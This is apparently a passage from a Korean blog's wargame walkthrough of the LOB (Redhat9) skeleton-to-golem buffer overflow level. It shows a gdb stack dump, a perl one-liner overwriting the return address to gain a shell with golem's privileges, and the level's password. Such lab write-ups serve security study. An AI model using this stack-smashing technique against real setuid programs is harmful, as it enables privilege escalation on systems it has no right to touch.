0xbffff730: 0x40013868 0xbffff778 0x4000c84c 0x08048034
0xbffff740: 0x00000006 0xbffff774 0x40013868 0xbffff9a8
0xbffff750: 0x40013da0 0x0001fbf1 0xbffffa50 0x000001fe
0xbffff760: 0x000001fe 0x000001fe 0x000001fe 0x00000006
0xbffff770: 0x08048034 0x080483c0 0xbffff79c 0x40002179
0xbffff780: 0xbffffa40 0x4000220c 0x080483c0 0x40013868
0xbffff790: 0x00000000 0xbffff7f8 0xbffff788 0xbffffa34
0xbffff7a0: 0x400020ea 0xbffffa40 0xbffff808 0x00000000
---Type <return> to continue, or q <return> to quit---q
Quit
[skeleton@localhost skeleton]$ ./golem `perl -e 'print "\xbf"x44,"\x70\xf5\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿poy¿
bash$ id
uid=510(skeleton) gid=510(skeleton) euid=511(golem) egid=511(golem) groups=510(skeleton)
bash$ my-pass
euid = 511
cup of coffee
bash$
'Wargame > LOB (Redhat9)' 카테고리의 다른 글
| darkknight -> bugbear (0) | 2014.02.20 |
|---|---|
| golem -> darkknight (0) | 2014.02.20 |
| vampire -> skeleton (0) | 2014.02.20 |
| troll -> vampire (0) | 2014.02.20 |
| orge -> troll (0) | 2014.02.20 |
